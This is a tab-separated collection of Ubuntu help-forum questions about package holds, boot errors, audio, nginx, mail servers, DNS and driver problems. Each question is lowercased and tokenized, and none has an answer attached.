414216	prevent packages 'on hold ' to show up when i upgrade	i did sudo apt-mark hold nameofthepackage on 3 packages , but now i have an annoying remark when i upgrade with sudo apt-get upgrade : following packages have been holded : package1 package2 package3 0 upgraded , 0 installed , 0 to remove and 3 non-updated . ( i 'm sorry about the unexact output of the terminal , i 'm using a french-version and i do n't know exactly how to say this in english . ) does it exist a way of `` hiding '' this ? i would like to have the usual 0 non-updated even when i hold packages . thanks
414221	ca n't locate software after installing	i installed gnome-mplayer using synaptic but now i ca n't find it to run it . going to menu and searching just lists rythmbox . ubuntu software would n't let me install mplayer which is why i needed to install synaptic first . any suggestions , thanks , bob
414222	elf header smaller than expected	i have an aspire one laptop with ubuntu on it ( installed by a friend ) . it worked fine and i loved it ! one day i tried to boot my laptop and the message on the screen was : elf header smaller than expected grub rescue > i have tried everything my laptop does not have a cdrom so i am stuck . i have no idea where to go from here please help me .
414224	system not going to sleep ( ubuntu 13.10 )	i have a toshiba l505d laptop running ubuntu 13.10 . i like to watch netflix ( pipelight ) when i am going to sleep . i have noticed that my system is not fully `` going to sleep '' when i wake up . i have a cooling pad under my laptop that is powered via usb , and when i wake up , it is still active . when i was running windows on the system , the system would hibernate and the cooling pad would deactivate . i have tried setting up suspend in system settings , as well as using the hibernate option in gnome tweak . this issue still occurs if i close the lid of the system . could someone please tell me how to get the system to fully `` go to sleep ? '' thank you in advance . gnome 3.10 . the issue also occurs with unity .
414225	does nginx require an ubuntu user for each server block ?	does nginx require an ubuntu user for each server block ? is it considered good practice to do so even if it 's not a requirement ? i plan on storing the files for each domain in /var/www/somedomain.com/public_html , not in any given users home folder .
414228	haroopad not starting and prompt of `` nvctrl extension does not exist '' message	i installed haroopad on my ubuntu gnome 13.10 system . i had to change some symbolic links in order to make it work . however after i 've closed it , i tried to run it , but i 'm getting this message : ` [ 3964:0201/150344 : info : gpu_info_collector_x11.cc ( 80 ) ] nvctrl extension does not exist . my graphics come from the intel chipset of my laptop 's motherboard . what can i do in order to fix this ?
414229	how to install totem 3.2 in ubuntu 12.04 ?	i would like to know how to install totem 3.2 in ubuntu 12.04 because i had issues with the 3.4.3 version and 3.0.1 is too old and does n't support some stuff that 3.2 supports . so can anyone provide me with a proper prosses that will actually install totem 3.2 without any dependency issues ?
414230	freshly installed ubuntu12.04 with no sound at laptop speakers but working on headsets !	i am really new to ubuntu and i just got installed it . the problem is that i can not turn on my laptop sounds . my laptop is sony vaio svf1521b1e . when i connect my headset to the laptop they are working and they have sound . but there is no sound from my laptop speakers . how i can fix that ? i have tried many things . sudo aplay -l [ sudo ] password for venelin : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i have added this options snd-hda-intel model=generic to /etc/modprobe.d/alsa-base.conf and rebooted my laptop but still no sounds from my laptop speakers . so please tell me how i can fix this . thanks in advance !
414231	mouse settings problem	when i installed ubuntu 13.10 after having windows 7 , i noticed that there was something wrong with the mouse pointer . it just does n't move the way he used in windows , and i 'm trying to solve this problem modifying its settings , like the acceleration , but it did n't work . using the command xinput -- list-props i got this : device 'logitech usb receiver ' : device enabled ( 140 ) : 1 coordinate transformation matrix ( 142 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 270 ) : 0 device accel constant deceleration ( 271 ) : 1.000000 device accel adaptive deceleration ( 272 ) : 1.000000 device accel velocity scaling ( 273 ) : 10.000000 device product id ( 259 ) : 1133 , 50446 device node ( 260 ) : `` /dev/input/event4 '' evdev axis inversion ( 274 ) : 0 , 0 evdev axes swap ( 276 ) : 0 axis labels ( 277 ) : `` rel x '' ( 150 ) , `` rel y '' ( 151 ) , `` rel horiz wheel '' ( 268 ) , `` rel vert wheel '' ( 269 ) button labels ( 278 ) : `` button left '' ( 143 ) , `` button middle '' ( 144 ) , `` button right '' ( 145 ) , `` button wheel up '' ( 146 ) , `` button wheel down '' ( 147 ) , `` button horiz wheel left '' ( 148 ) , `` button horiz wheel right '' ( 149 ) , `` button side '' ( 263 ) , `` button extra '' ( 264 ) , `` button forward '' ( 265 ) , `` button back '' ( 266 ) , `` button task '' ( 267 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) , `` button unknown '' ( 262 ) evdev middle button emulation ( 279 ) : 0 evdev middle button timeout ( 280 ) : 50 evdev third button emulation ( 281 ) : 0 evdev third button emulation timeout ( 282 ) : 1000 evdev third button emulation button ( 283 ) : 3 evdev third button emulation threshold ( 284 ) : 20 evdev wheel emulation ( 285 ) : 0 evdev wheel emulation axes ( 286 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 287 ) : 10 evdev wheel emulation timeout ( 288 ) : 200 evdev wheel emulation button ( 289 ) : 4 evdev drag lock buttons ( 290 ) : 0 is there anything wrong ? because i feel the mouse is n't working as well as in windows . maybe the pointer accelerates too fast in some directions .
414233	shutdown launcher withouth password	i added new launcher to panel using this command for shutdown : gksu telinit 0 when i wanted to get rid of constant inserting of password , i did not succeed . i opened visudo and added line `` username '' all = nopasswd : sbin/telinit 0 ... but it does n't work i succeded with hibernate launcher in similar way - with adding line in visudo : `` username '' all = nopasswd : etc/acpi/hibernate.sh what am i doing wrong with shutdown line in visudo ?
414234	how can i activate burn effect on ubuntu 13.10 ?	i saw on youtube that there is an effect that makes the windows catch fire when closing . here is the link : https : //www.youtube.com/watch ? v=1lum6ci32rk but i could not make this effect work in 13.10 . anyone know how to do this ?
414237	create new domain tools or script ?	i 'm new to *nix , ubuntu , and nginx and so far it 's a lot of fun playing around with new technology . however , after following tutorials on how to setup a new domain ( server block ) i can see how this would quickly become tedious . is there any package i can install that would allow me to quickly , and easily spin up a new domain on my server ? and an sftp user ? and email ? i have n't found anything , so this is going to be my weekender project to create this myself , but if there is an existing wheel out there then i 'd rather not reinvent it . essentially , i 'd like something like this ( where the package is called 'ubmaster ' ) : $ sudo ubmaster create domain $ enter fqdn : somedomain.com $ enter sftp username : somedomain.com $ enter sftp password : somepassword $ enter email : user @ somedomain.com $ enter email password : someuserpassword $ -- - spinning it up -- - $ automatically created www.somedomain.com sub-domain . $ automatically transferred skelton to /var/www/somedomain.com . $ automatically chroot'ed user somedomain.com . $ automatically created new server block for somedomain.com . $ automatically âś ? $ automatically created temporary url . $ -- - voila ! -- - $ your new domain is ready at : xxx.xxx.xxx.xxx/~somedomain.com and i can already see where i 'd want more commands : $ sudo ubmaster create email somedomain.com $ enter email address : new user @ somedomain.com $ enter email password : newuserpass $ -- - voila ! -- - and : $ sudo ubmaster create sub-domain somedomain.com $ enter sub-domain : somesub.somedomain.com $ automatically creating sub-domain root folder . $ -- - voila ! -- - $ your new sub-domain is ready at : some-sub.somedomain.com etc . etc . i 've looked at http : //www.ajenti.org , but they 're not ready . and http : //www.webmin.com is just too ugly . and http : //www.zpanelcp.com is too buggy from what i 've determined just trying to install it . and various other reasons for the rest .
414241	is ubuntu 32-bit only for systems with `` less than 2gb ram '' ?	on the downloads page , you have the following two options : 64-bit 32-bit ( for machines with less than 2gb ram ) assuming you have a 32-bit machine with the maximum 4gb of ram , will ubuntu will work on that ?
414242	how do i transfer android phone contacts to an ubuntu phone ?	i 've owned a nexus 4 for some time now ( in readiness for ubuntu touch ) , and i 'm considering making the switch . however , first i 'd like to make sure that i really understand how to do several things . one of the most important is how to transfer over contacts i have on the android install to the new install of ubuntu touch . this does n't seem to be covered in the major `` install ubuntu for phones '' instructions , so can anyone advise on how best to do this ? ( of less importance -- but still relevant -- what 's the battery life looking like for nexus 4 with the recent touch images ? )
414244	should i enable zram and/or lower swappiness value ?	i use ubuntu 12.04 lts . i have 2gb ram . now , that is split about 55-45 memory-swap . my cpu is almost flatlined ! could i get faster leaner meaner more efficient performance if i lowered swappiness down to 10 and/or enabled zram . or should i leave well-enough alone ? i am under the impression that zram is built into ubuntu 12.04 and only needs to be enabled with a simple command . should i do both together or should i do one but not the other ? thanks
414245	error 404 in ubuntu 12.04 lts ! how to make server work through virtualbox with a computer connected to wifi ?	before we start i would like to mention that i am new at this and that i also followed the following post : how to install ubuntu on virtualbox ? the problem here is that i tried to make my server accessible from the internet ; however , every time i try to connect to the server via the public ip , i get an error 404 . i did forward the ports ! the local ip works , i can access the server via another computer in the same lan ( i set up a static ip ) . is there something i 'm missing ? perhaps something that has to do with the fact that it is via wifi ? is there a way to find out what the problem is ? thanks for any help in advance !
414247	can i use the embedded nautilus-terminal in ubuntu 13.10 ?	in previous versions of ubuntu , i have used nautilus-terminal which embeds a terminal into the nautilus window . in ubuntu 13.10 , i have intalled nautilus-terminal using the usual steps : sudo add-apt-repository ppa : flozz/flozz sudo apt-get update sudo apt-get install nautilus-terminal i have restarted my computer , but there is nothing showing up in nautilus . i have tried f4 as well as ctrl+shift+t , but neither bring nautilus-terminal into view . i am using the default files application that comes with it - 3.8.2 .
414248	create user 's account in postfix 's server	i have istalled postfix in ubuntu 12.04 , so that a user can write and read its messages , that 's for an user that i already create its account in the server . but what about a new user , i mean how could he create its own account ? thank you
414249	how to access domains via ip using nginx ?	i 'm currently working on switching my webserver from cent os running apache2 and cpanel to ubuntu 12.04 lts running nginx without a gui ( unless i can find a good one ) . one thing i have n't been able to find any information on is how to setup temporary url 's to access a domain before pointing the dns at my server . cpanel creates 'temporary ' urls when you create a new domain like so : xxx.xxx.xxx.xxx/~somedomain.com i 'd like to achieve the same thing using ubuntu 12.04 and nginx . does anyone know how i would go about doing this ? i 'm currently doing my homework on the location { } block of a server { } block , but i 'm wondering if anyone can provide an example . thanks .
414250	ubuntu 13.10 amd radeon hd 4870 no drivers or fglrx tools	i recently upgraded from ubuntu 12.04 to 13.10 . i have a amd radeon hd 4870 graphics card . on 12.04 i used amd proprietary drivers from their website and had no problems but since switching to 13.10 when i tried to install the drivers it says that there are fglrx tools missing that need to be there for install . i tried using apt-get to install fglrx , and when the download finished i rebooted my pc and said that the graphics drivers were no good and i had to reinstall 13.10 . so i ca n't just apt-get the fglrx drivers like i have done previously . does anyone have a solution and does anyone else have this issue ? i would like to have the catalyst control centre but that comes with the proprietary drivers not with the radeon open source drivers . i also use a 32 bit system if that helps . thanks
414251	asus fn-kys for sound volume ( laptop-hotkeys ) do n't work	the hotkeys for sound volume of asus n76vm with ubuntu 12.04 do n't work on the ( my ) admin account , but d贸 work on other users accounts for the rest of the family .
414255	ubuntu12.04 - no sound at laptop speakers but working on headsets	i am really new to ubuntu and i just got installed it . the problem is that i can not turn on my laptop sounds . my laptop is sony vaio svf1521b1e . when i connect my headset to the laptop they are working and they have sound . but there is no sound from my laptop speakers . how i can fix that ? i have tried many things . aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : hda generic [ hda generic ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 this might be usefull to : cat /proc/asound/card0/codec # * | grep codec codec : realtek id 233 codec : intel pantherpoint hdmi i have added this options snd-hda-intel model=generic to /etc/modprobe.d/alsa-base.conf and rebooted my laptop but still no sounds from my laptop speakers . so please tell me how i can fix this . i have already scaned for drivers with jockey but it 's not giving me any sound drivers . only one for wireless and one for nvidia . thanks in advance !
414256	unity menu headings and nautilus icons/text ignoring text scaling factor	i reported this as a bug here , but i 'm wondering if anyone knows of a workaround to fix this problem . after the latest ubuntu update , which included a new kernel , suddenly the text scaling factor ( which is changed by turning `` large text '' to `` on '' in the universal access settings ) has no effect on menu headings in all applications as well as folder/file icons and text in nautilus , the dash , and the desktop . screenshots are attached in the bug report .
414258	successfully connected to a bluetooth speaker , but how do i direct sound there ?	i 'm running kubuntu 13.10 on a lenovo thinkpad t430 laptop . i 've got a bluetooth speaker . after a lot of troubleshooting i managed to connect to the speaker . bt-device reports : $ bt-device -l added devices : [ samsung ] w_audio ( 5c : f6 : dc:88:05:62 ) $ bt-device -i 5c : f6 : dc:88:05:62 [ 5c : f6 : dc:88:05:62 ] name : [ samsung ] w_audio alias : [ samsung ] w_audio [ rw ] address : 5c : f6 : dc:88:05:62 icon : audio-card class : 0x240404 paired : 1 trusted : 1 [ rw ] blocked : 0 [ rw ] connected : 1 uuids : [ audiosink , avremotecontroltarget , avremotecontrol ] when i connect to the speaker , it plays a welcoming sound . when i click `` audio sink '' in the bluetooth manager ( it 's bluemon i think ) , the speaker plays another sound , and a `` success '' message appears in the bluetooth manager . but the bluetooth audio does not appear anywhere in settings . there is no option to direct sound to the speaker . all the sound comes from laptop speakers and the bluetooth speaker is silent . i installed pulseaudio and pavucontrol ( with a bunch of other pulseaudio- and bluetooth-related packages ) . pavucontrol on the output devices tab shows only the main audio device , but according to guides over the web , bluetooth audio should appear there . so ... once i have the bluetooth speaker connected , how do i direct sound there ? some dumps that might be relevant : $ pacmd list-sinks welcome to pulseaudio ! use `` help '' for usage information . > > > 1 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : running suspend cause : priority : 9959 volume : 0 : 86 % 1 : 86 % 0 : -3,93 db 1 : -3,93 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : no current latency : 5,62 ms max request : 1 kib max rewind : 64 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 1 linked by : 3 configured latency : 5,80 ms ; range is 0,50 .. 371,52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc3202 analog '' alsa.id = `` alc3202 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xf2530000 irq 48 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1e20 '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` intel pantherpoint hdmi '' alsa.components = `` hda:10ec0269,17aa21f3,00100203 hda:80862806,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : headphones ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : < analog-output-speaker > $ pacmd list-sources welcome to pulseaudio ! use `` help '' for usage information . > > > 2 source ( s ) available . index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo.monitor > driver : < module-alsa-card.c > flags : decibel_volume latency dynamic_latency state : running suspend cause : priority : 1950 volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : no current latency : 0,00 ms max rewind : 64 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 2 linked by : 2 configured latency : 20,00 ms ; range is 0,50 .. 371,52 ms monitor_of : 0 card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : device.description = `` monitor of built-in audio analog stereo '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xf2530000 irq 48 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1e20 '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' * index : 1 name : < alsa_input.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : running suspend cause : priority : 9959 volume : 0 : 0 % 1 : 0 % 0 : -inf db 1 : -inf db balance 0,00 base volume : 10 % -60,00 db volume steps : 65537 muted : no current latency : 0,00 ms max rewind : 0 kib sample spec : s16le 2ch 48000hz channel map : front-left , front-right stereo used by : 1 linked by : 1 configured latency : 20,00 ms ; range is 0,50 .. 341,33 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc3202 analog '' alsa.id = `` alc3202 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xf2530000 irq 48 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1e20 '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` intel pantherpoint hdmi '' alsa.components = `` hda:10ec0269,17aa21f3,00100203 hda:80862806,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone-internal : internal microphone ( priority 8900 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-input-microphone '' analog-input-microphone-dock : dock microphone ( priority 7800 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-input-microphone '' analog-input-microphone : microphone ( priority 8700 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-input-microphone '' active port : < analog-input-microphone-internal >
414259	how can i repair my php installation ?	i try to test my php installation on a ubuntu server without gui . therefore i follow the 3rd this howto for lamp ( ! ) . this includes to install php5 et al . with sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt then php is added to the directory index . sudo nano /etc/apache2/mods-enabled/dir.conf so that the file is : < ifmodule mod_dir.c > directoryindex index.php index.html index.cgi index.pl index.php index.xhtml index.htm < /ifmodule > i have the file /var/www/info.php like this : < ? php phpinfo ( ) ; ? > there is no output , when i try to reach the page on another machine with http : //hostname/info.php index.html shows me 'it works ! ' , but /var/log/apache2/error.log shows error : [ ..date.. ] [ mpm_prefork : notice ] [ pid 13057 ] ah00163 : apache/2.4.6 ( ubuntu ) svn/1.7.9 php/5.5.3-1ubuntu2.1 mod_perl/2.0.8 perl/v5.14.2 configured -- resuming normal operations [ ..date.. ] [ core : notice ] [ pid 13057 ] ah00094 : command line : '/usr/sbin/apache2' [ ..date.. ] [ : error ] [ pid 13064 ] [ client 192.168.x.n:59821 ] php parse error : syntax error , unexpected ' < ' in /var/www/info.php on line 3 [ ..date.. ] [ : error ] [ pid 13065 ] [ client 192.168.x.n:59822 ] script '/var/www/index.php ' not found or unable to stat x and n are numbers , n is the ip of the client trying to access the page . output of cat /var/www/info.php < ? php < h3 align= '' center '' > '' awesomeness has no charge '' - po the panda < /h3 > < -- here is the error ... ok , thx . phpinfo ( ) ; ? > and $ ls -la /var/www/info.php -rw-r -- r -- 1 root root 86 feb 1 23:33 /var/www/info.php
414262	wifi connection issue , wpa2 enterprise with cert using ubuntu 12.04 lts	i am trying to connect to my school 's wifi . i have been instructed to use the following configuration . but the issue is i am unable to connect . i was able to connect to a different wifi network for apt . wireless security : wpa & wpa2 enterprise authentication : protected eap ( peap ) anonymous identity : _______ ca certificate : addtrust_external_root.pem ( can usually be found in /etc/ssl/certs ) peap version : version 0 or auto inner authentication : mschapv2 username : # # # password : # # # please let me know if you need any other information .
414263	emails send to yahoo declined	i recently set up purchased a vps , installed ubuntu 12.04 lts on it and webmin/virtualmin . i think i configured dns records for each domain i 've added properly . when i am sending emails to an yahoo email i receive the following error : c658ba3706 565 wed jan 29 15:13:47 nedegroup @ nedegroup.com ( host mta5.am0.yahoodns.net [ 98.136.217.202 ] said : 421 4.7.1 [ ts03 ] all messages from 188.226.139.41 will be permanently deferred ; retrying will not succeed . see http : //postmaster.yahoo.com/421-ts03.html ( in reply to mail from command ) ) how can i solve this problem ? i do not intent to send bulk/spam email . is there a way to make all my email accounts created on different domain names under my vps to send emails to the inbox folder of other email accounts ? for example when i send to gmail my emails go to inbox , but when i send to hotmail they go to the spam folder . thanks
414264	logitech h390 headset not recognized ubuntu 13.10	i am having issues getting my usb headset ( logitech h390 ) to work with my computer . i am using ubuntu 13.10 . here is the output from lsusb : nihil @ nihil-ga-970a-ds3 : ~ $ lsusb bus 003 device 003 : id 03f0:8811 hewlett-packard bus 003 device 002 : id 14cd:168a super top bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 003 : id 046d : c52b logitech , inc. unifying receiver bus 004 device 002 : id 04b3:310c ibm corp. wheel mouse bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 002 : id 046d:0a44 logitech , inc . bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub nihil @ nihil-ga-970a-ds3 : ~ $ bus 004 device 003 and bus 008 device 002 are the wireless receiver and keyboard i use , respectively . when i open up the sound gui nothing shows up in regards to the headset . i can find my speakers and the sound option for the second monitor but nothing for the headset or the microphone portion of it .
414266	icon of my software do n't appear	as it is said in the title i have a problem on the appearance on my icon 's software . just see below :
414269	hold a key to temporarily switch keyboard layout ?	i recently upgraded to ubuntu 13.10 . in ubuntu 12.04 , i was able to define a key which , while holding it , temporarily switched to a different keyboard layout . i have n't been able to find a way to get that functionality in 13.10 : the only option seems to be to toggle between different layouts using the `` switch to next source '' shortcut . is there a way to get the `` hold a key to temporarily switch to a different keyboard layout '' functionality in 13.10 ?
414272	nvidia optimus problems	i have an optimus machine.. i was checking for solutions for a game and someone suggested updating the drivers i picked one of the suggested drivers in the system panel .. rebooted and everything was utterly wrong.. docky does n't support 3d anymore.. my game is n't starting at all and when i tried to log in with the unity shell the 3d options were off.. went to nvidia 's site and downloaded the right driver.. but it gives me this famous error error : if you are using a linux 2.4 kernel , please make sure you either have configured kernel sources matching your kernel or the correct set of kernel headers installed on your system . if you are using a linux 2.6 kernel , please make sure you have configured kernel sources matching your kernel installed on your system . if you specified a separate output directory using either the `` kbuild_output '' or the `` o '' kbuild parameter , make sure to specify this directory with the sysout environment variable or with the equivalent nvidia-installer command line option . depending on where and how the kernel sources ( or the kernel headers ) were installed , you may need to specify their location with the syssrc environment variable or the equivalent nvidia-installer command line option . i remember overcoming this error do n't remember how.. tried to forget about the drivers and use ironhide , but it did n't really get installed.. then downloaded bumblebee-ui and got some problems with it .. what should i do now ? ? ! i have nvidida geforce gt 425m and using ubuntu 12.04
414273	no internet connection wired/wifi with ubuntu 13.10	i have the a problem ever since i made an update from 13.04 to 13.10 . i can see the wifi networks but connection is not possible . same with wired network too . i have atheros 9285 adapter in laptop . how can i upgrade the grub offline with no internet connection . i updated the kernel to 3.12 . thanks
414277	ca n't resolve windows domains in local network	i 've installed ubuntu on my computer at work because i think it is a perfect system for work which i do but i got some issues . i ca n't resolve domains from windows dns server . basically , we have two servers , one is windows server ( dns sever ) and another one is ubuntu 12.04 ( lamp ) . so every time when i create new project i have to create new alias on dns server for example project1.localdomain.local which points to ubuntu server . on ubuntu server i have to create the project in directory /var/www/project1/htdocs . everything works for computers in local network with windows or for macs . so basically when i am trying open a link http : //project1.localdomain.local in a browser it works . but when i do it on my computer with fresh ubuntu installation it does n't . it looks like ubuntu ca n't resolve local domain where dns server is . so my network looks like that : 10.10.16.1 - dns server - windows server domain - test i 've already tried resolved the problem adding lines to /etc/resolve.conf file domain test nameserver 10.10.16.2 /etc/networkmanager/networkmanager.conf file i commented out line # dns=dnsmasq /etc/dhcp/dhclient.conf i added lines supersede domain-name `` test '' ; prepend domain-name-servers 10.10.16.1 , 10.10.16.2 ; but it does n't work . on windows or mac i do n't have to do any additional configuration to make it work . this is the contents of /etc/nsswitch.conf : passwd : compat group : compat shadow : compat hosts : files mdns4_minimal [ notfound=return ] dns mdns4 networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis
414278	integrated webcam not found on lenovo g500 ?	i have lenovo g500 laptop with integrated camera . at first i had windows 8 installed on it . everything worked perfectly , but when i 've installed 12.04 the integrated webcam was n't found by skype , cheese etc . i 've searched on many forums but i 've did n't found solution .
414280	gnome mplayer and [ play/pause ] , [ next ] buttons	on ubuntu 13.10 i 'm using the [ fn ] + [ play/pause ] key combination successfully with totem , but because totem makes my whole screen flicker when i use javascript at the same time , i switched to gnome mplayer . but gnome mplayer does n't seem to respond to the [ play/pause ] , [ next ] , [ previous ] buttons . why not ? is this a missing feature ? i can play/pause mplayer in the menu below the sound symbol in the task bar .
414283	error : no video mode activated	i am getting `` error : no video mode activated . '' after i tried to fix another problem . all i did was run these commands , sudo sed -i -e 's/ # grub_terminal/grub_terminal/g ' /etc/default/grub sudo update-grub from : why does switching to the tty give me a blank screen ? now i ca n't do anything due to the `` error : no video mode activated '' occuring on the screen . it wo n't even boot normally after a few seconds like in the other problems . i have ubuntu 12.04 , gtx 660 ti . should i spec something else ? what should i do ? when going to recovery mode and root , i ca n't even edit a file due to everything being read-only . i 'm totally new to this , so please give copy-pastable answers .
414285	how to access hp-plugin-ubuntu in 12.10	i have updated 12.10 . when i run my printer , hp 1022 laserjet , i receive a pop up that tells me : hp laserjet 1022 printer has an optional proprietary plugin . run hp-plugin-ubuntu . so , i input : sudo hp-plugin-ubuntu . after entering my password nothing happens , no error messages , no instructions - just a blinking cursor . currently my printer works . however , there are some options i use when running windowsxp that i miss currently when running the printer under ubuntu . i would like to see if the plugin restores those options .
414286	how to use gnome tweak tool to get shell themes	so i 'm trying to get custom shells and have tried using this as many people have recommended it . all i see in the shell extensions menu is `` install shell extension '' and when i click on the link user themes is n't there . also , in the theme menu , there is a triangle with an exclamation mark in it next to shell theme . how can i fix this and get shell themes like faience ?
414287	syncing a folder on computer with external drive	i know that there are some file sync options ( particularly rsync ) available , but i 'm trying to do something specific with my sync . i have a movies folder with tons of video files , and i 'd like to have an automatic sync where anything added to the movies folder gets added to the corresponding videos folder on my external drive . i want to store all of my media in the external drive , and some of it on my computer . if i add something to the movies folder on the computer , i would like for it to be added to the external drive automatically , however , i do not want to delete anything that is in the external but not in the internal drive . basically , i would like for any new files in my computer to be added to the external drive automatically , but not have a true sync where things might get deleted from the external . is this possible ? thanks !
414291	ping : unknown host	since few days , my dedicated server ( ubuntu 13.04 ) is no longer able to ping or connect to my nas through dns ( hostname - > kr1.synology.me ) . the ip address ( 178.83.88.248 ) address against , is still reachable , i can ping to it , and also connect it via ssh . concretely i can do this : sudo ssh root @ 178.83.88.248 sudo ping 178.83.88.248 but not this ( whereas before yes ) : sudo ssh root @ kr1.synology.me sudo ping kr1.synology.me the problem is not from nas side , because i can still reach it with root @ kr1.synology.me from my local machine . the problem occurs only from my dedicated server . here are some options i did recently on my server : i installed ufw and configured it to only allow some ports i prevented the ability to connect as root in ssh i prevented the ability to connect with ssh password ( key required ) i installed and configured denyhosts and fail2ban i installed rkhunter and chkrootkit â i added no recursion & `` not disclosed '' to bind9 configuration i added nospoof to /etc/host.conf will you help me solve the problem ? i spent several hours on it and can not clearly identify the cause .
414293	how to install ethereum ?	using ubuntu 12.04 , how do i install this correctly ? ethereum is a next-generation distributed cryptographic ledger that is designed to allow users to encode advanced transaction types , smart contracts and decentralized applications into the blockchain . ethereum will support custom currencies or `` colored coins '' , financial derivatives , and much more , but unlike many previous networks that attempted to accomplish the same thing ethereum does not attempt to constrain users into using specific `` features '' ; instead , the ledger includes a built-in turing-complete programming language that can be used to construct any kind of contract that can be mathematically defined .
414296	touchpad not working on yoga 2 pro	the touchpad is not being recognized on my yoga 2 pro . i have to use an external mouse . there is a touchpad in /proc/bus/input/devices . help would be greatly appreciated .
